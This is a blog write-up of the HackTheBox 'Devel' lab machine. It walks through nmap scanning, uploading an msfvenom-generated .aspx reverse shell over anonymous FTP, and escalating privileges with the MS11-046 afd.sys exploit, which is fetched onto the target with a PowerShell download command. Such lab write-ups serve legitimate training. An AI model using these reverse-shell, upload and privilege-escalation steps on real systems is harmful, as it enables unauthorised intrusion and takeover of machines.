Posts HackTheBox - Devel

HackTheBox - Devel

Although it’s been a while since my last upload due to getting a new job, i thought it was time to get back on the grind, starting with Devel. This was my second machine rooted without using Metasploit. This machine exploits a Windows web server with anonymous upload privileges via FTP enabled. Once inside, i used “afd.sys” (MS11-046) to esculate priviledges and gain root!


  • Port scan using NMAP
  • Upload MSFVenom generated .apsx shell to web server via FTP
  • Elevate privilidges using ‘afd.sys’ to gain root

Machine IP:



nmap -n -p- -sV -T 5


FTP is open and so is port 80. Further enumeration:

nmap -p 80,21 -sC -sV -O


FTP anonymous login is allowed! Maybe we can exploit this? It also containts an aspnet_client. What is it?


Anonymous FTP is enabled. We also have the ability to upload files using PUT.


These are the files located within the FTP directory.




It seems the website is hosted in the same root directory as FTP. As the file “iisstart.htm” is reachable. Maybe we could upload something via FTP and access it via HTTP?

Creating a simple test.html file and upload it via FTP


Then The on the browser navigate to


It works, confirming that files uploaded by FTP and navigated to are executed by the webserver. The webserver is Microsoft IIS 7.5

Maybe we can upload a reverse shell via FTP and get the web server to execute it?

IIS 7.5

After some googling to find out more about IIS 7.5, i stumbled across this website.

It highlights that the webserver can do much more than host “ASP.NET apps”.

Okay, but what are ASP.NET apps? After some more googling it seems they use the extension .aspx

As per

An ASPX file is an Active Server Page Extended (ASPX) file, which is a webpage generated by web servers running the Microsoft ASP.NET framework.

Well our webserver is running the ASP.NET framework, and so we could create a payload with the extension .aspx and get the webserver to execute it!


So now we know that our web server executes .aspx files, we can create a payload using msfvenom with the .aspx extention, and upload it to the root directory.

So first of all, lets check .aspx is a valid format for msfvenom.

msfvenom --list format | grep aspx


Both the aspx and aspx-exe extensions are available, great!

Now lets find a windows reverse shell. We will not use meterpreter as it is not available on the OSCP.

msfvenom --list payloads | grep windows/shell

windows/shell_reverse_tcp                  Connect back to attacker and spawn a command shell


Now lets create a .aspx payload called rshell.aspx

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST= LPORT=4444 -o rshell.aspx

and then upload it using FTP.

put rshell.aspx

Start a netcat listener on port 4444, or any port you like, and get the web server to execute the file.


Navigating to Users, we can see we have 2 accounts:

  • Admin
  • babis

However, we do not have access to either.


Time for some priviledge esculation.

Priviledge Esculation

System information

Lets start by finding out some information about our target machine:


It looks as though Windows 7 Enterprise version 6.1.7600 is running, and it has not been patched! Lets have a look for some exploits on google.

This looks like exactly what we need. Lets have a look at the exploit notes:


It seems the exploit will be compiled within our host machine, and then uploaded to the target machine before execution.


First, lets get the file onto our host machine. As the website shows the file is EDB verified, we should be able to find it in searchsploit.

searchsploit -m 40564

Rename the file to MS11-046.c using mv, and then run the command given within the exploit. The compiling will fail, due to our host system not having mingw installed. We can install this using:

sudo apt-get install mingw-w64

Re-run the command, and it will compile.


Great, we now have an executable! Now to get it on the target machine.


The target machine does not have netcat installed, however it does have Windows powershell, so we will use that to connect back to our host machine and download the file.

Start with a Simple python server:

python -m SimpleHTTPServer 6666

and then on the remote machine, use powershell to connect back to the host, and download the file.

This website gives a good insight into how to do this using (new-object System.Net.WebClient).DownloadFile

powershell -c "(new-object System.Net.WebClient).DownloadFile('' , ‘c:\Users\Public\Downloads\MS11-046.exe’)"

Navigate to /Users/Public/Downloads


We can see the file is there! Execute it!


We have root!!


Here are the flags for this machine!

User: user

Root: Root

This post is licensed under CC BY 4.0 by the author.